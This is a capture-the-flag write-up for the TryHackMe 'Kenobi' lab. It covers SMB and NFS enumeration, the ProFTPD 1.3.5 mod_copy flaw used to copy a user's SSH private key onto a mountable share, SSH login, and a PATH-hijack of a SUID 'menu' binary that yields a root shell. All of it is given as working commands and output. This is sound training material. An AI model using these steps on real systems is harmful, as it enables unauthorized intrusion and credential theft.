TryHackMe – Kenobi

Room: https://tryhackme.com/room/kenobi

Enumeration

Port Scan (nmap)

nmap -sV -v 10.10.68.196

Running our nmap scan, we get 7 ports back that are open. An FTP drive, SSH, web server, and Samba smb most notably.

SMB Enumeration

nmap has a script to enumerate over smb, so let’s run that:

nmap -p 445 --script=smb-enum-shares.nse,smb-enum-users.nse 10.10.68.196

We get back three SMB drives: IPC$, anonymous and print$. let’s investigate the anonymous one:

# log into the anonymous share, just press enter for password
┌──(kali㉿kali)-[~/thm]
└─$ smbclient //10.10.68.196/anonymous                                                     130 ⨯ 1 ⚙
Enter WORKGROUP\\kali's password: 
Try "help" to get a list of possible commands.

# we run ls and see a log.txt
smb: \\> ls
  .                                   D        0  Wed Sep  4 06:49:09 2019
  ..                                  D        0  Wed Sep  4 06:56:07 2019
  log.txt                             N    12237  Wed Sep  4 06:49:09 2019

                9204224 blocks of size 1024. 6877112 blocks available

# let us logout
smb: \\> exit

# and lets run smbget to grab that file                                                                                        
┌──(kali㉿kali)-[~/thm]
└─$ smbget -U anonymous smb://10.10.68.196/anonymous/log.txt                                     1 ⚙
Password for [anonymous] connecting to //anonymous/10.10.68.196: 
Using workgroup WORKGROUP, user anonymous
smb://10.10.68.196/anonymous/log.txt                                                                 
Downloaded 11.95kB in 3 seconds

RPC Bind Enumeration

We know from our nmap scan 111 is running rpcbind, in our case it’s an nfs drive so we can use nmap as well to enumerate

nmap -p 111 --script=nfs-ls,nfs-statfs,nfs-showmount 10.10.68.196
PORT    STATE SERVICE
111/tcp open  rpcbind
| nfs-showmount: 
|_  /var *

We know about the /var drive

Gain Access

The server is running ProFTPd and some versions could be vulnerable. We can use netcat to access and see what version it is running:

┌──(kali㉿kali)-[~/thm]
└─$ nc 10.10.68.196 21                                                                           1 ⚙
220 ProFTPD 1.3.5 Server (ProFTPD Default Installation) [10.10.68.196]

And now use searchsploit to look for any exploits:

┌──(kali㉿kali)-[~/thm]
└─$ searchsploit proftpd 1.3.5                                                               2 ⨯ 1 ⚙
------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                     |  Path
------------------------------------------------------------------- ---------------------------------
ProFTPd 1.3.5 - 'mod_copy' Command Execution (Metasploit)          | linux/remote/37262.rb
ProFTPd 1.3.5 - 'mod_copy' Remote Command Execution                | linux/remote/36803.py
ProFTPd 1.3.5 - File Copy                                          | linux/remote/36742.txt
------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

We have 3 exploits! They are based around the mod_copy module which implements SITE CPFR (copy from) and SITE CPTO (copy to) commands. Earlier, we downloaded the log file from the server and after reading through it, we can see the the service is running as the Kenobi user and there is an ssh key for that user. So let’s log back into the FTP and try to copy that ssh key to /var, which is the directory running an NFS that we could mount to in order to grab the key for ourselves.

┌──(kali㉿kali)-[~/thm]
└─$ nc 10.10.68.196 21                                                                           1 ⚙
220 ProFTPD 1.3.5 Server (ProFTPD Default Installation) [10.10.68.196]
SITE CPFR /home/kenobi/.ssh/id_rsa
350 File or directory exists, ready for destination name
SITE CPTO /var/tmp/id_rsa
250 Copy successful

Great! Now we need to exit (Ctrl +C) and mount to /var in order to grab this key:

┌──(kali㉿kali)-[~/thm]
└─$ sudo mkdir /mnt/kenobiNFS
┌──(kali㉿kali)-[~/thm]
└─$ sudo mount 10.10.68.196:/var /mnt/kenobiNFS
┌──(kali㉿kali)-[~/thm]
└─$ ls -la /mnt/kenobiNFS                                                                        1 ⚙
total 56
drwxr-xr-x 14 root root    4096 Sep  4  2019 .
drwxr-xr-x  3 root root    4096 Mar 22 11:49 ..
drwxr-xr-x  2 root root    4096 Sep  4  2019 backups
drwxr-xr-x  9 root root    4096 Sep  4  2019 cache
drwxrwxrwt  2 root root    4096 Sep  4  2019 crash
drwxr-xr-x 40 root root    4096 Sep  4  2019 lib
drwxrwsr-x  2 root staff   4096 Apr 12  2016 local
lrwxrwxrwx  1 root root       9 Sep  4  2019 lock -> /run/lock
drwxrwxr-x 10 root crontab 4096 Sep  4  2019 log
drwxrwsr-x  2 root mail    4096 Feb 26  2019 mail
drwxr-xr-x  2 root root    4096 Feb 26  2019 opt
lrwxrwxrwx  1 root root       4 Sep  4  2019 run -> /run
drwxr-xr-x  2 root root    4096 Jan 29  2019 snap
drwxr-xr-x  5 root root    4096 Sep  4  2019 spool
drwxrwxrwt  6 root root    4096 Mar 22 11:48 tmp
drwxr-xr-x  3 root root    4096 Sep  4  2019 www

We’re in! Now let’s grab the key from /var/tmp and use it to login:

┌──(kali㉿kali)-[~/thm]
└─$ cp /mnt/kenobiNFS/tmp/id_rsa .                                                               1 ⚙
                                                                                                     
┌──(kali㉿kali)-[~/thm]
└─$ sudo chmod 600 id_rsa                                                                        1 ⚙
                                                                                                     
┌──(kali㉿kali)-[~/thm]
└─$ ssh -i id_rsa [email protected]

kenobi@kenobi:~$

And now we can cat user.txt for the flag!

PrivEsc

We have access as kenobi, but let’s gain root access. Let’s search for any executables running with a SUID set:

kenobi@kenobi:~$ find / -perm -u=s -type f 2>/dev/null

One interesting one is /usr/bin/menu. Which if we execute, seems to be a custom menu interface created to run certain commands like checking the web interface, kernel version or ip address:

kenobi@kenobi:~$ /usr/bin/menu

***************************************
1. status check
2. kernel version
3. ifconfig
** Enter your choice :

By running strings /usr/bin/menu we can see what commands it is running:

curl -I localhost
uname -r
ifconfig

So we could modify our PATH to override one of these commands to gain us a root shell. The room does this as curl, but I am going to do it as ifconfig, because no options are selected with it.

# cd to the temp directory
kenobi@kenobi:~$ cd /tmp
# clone the /bin/sh shell as ifconfig
kenobi@kenobi:/tmp$ echo /bin/sh > ifconfig
# give it full permissions
kenobi@kenobi:/tmp$ chmod 777 ifconfig
# add our tmp directory containing our fake ifconfig to our PATH
kenobi@kenobi:/tmp$ export PATH=/tmp:$PATH
# rerun the menu and choose ifconfig option
kenobi@kenobi:/tmp$ /usr/bin/menu

***************************************
1. status check
2. kernel version
3. ifconfig
** Enter your choice :3

# whoami
root

And we are in! Now let’s check out root’s home directory cat /root and check out the flag cat root.txt!

Machine Compendium

{
	"MACHINE_IP": "10.10.68.196",
	"MACHINE_INFO" : {
		"os": "Ubuntu Linux",
		"host": "KENOBI"
	},
	"OPEN_PORTS": {
		"21": ["ftp", "ProFTPD 1.3.5"],
		"22": ["ssh", "OpenSSH 7.2p2 Ubuntu 4ubuntu2.7"],
		"80": ["http", "Apache httpd 2.4.18"],
		"111": ["rpcbind", "2-4 (RPC #100000)"],
		"139": ["netbios-ssn", "Samba smbd 3.X - 4.X"],
		"445": ["netbios-ssn", "Samba smbd 3.X - 4.X"],
		"2049": ["nfs_acl", "2-3 (RPC #100227)"]
	},
	"SMB":{
		"paths": ["\\\\10.10.68.196\\IPC$","\\\\10.10.68.196\\anonymous","\\\\10.10.68.196\\print$"]
	},
	"CREDENTIALS":{

	},
	"OTHER_INFO": {
		"vulnerabilities": ["ProFTPD 1.3.5"]
	}
	
}

Comments

No comments available.

Leave a Reply

Your email address will not be published. Required fields are marked *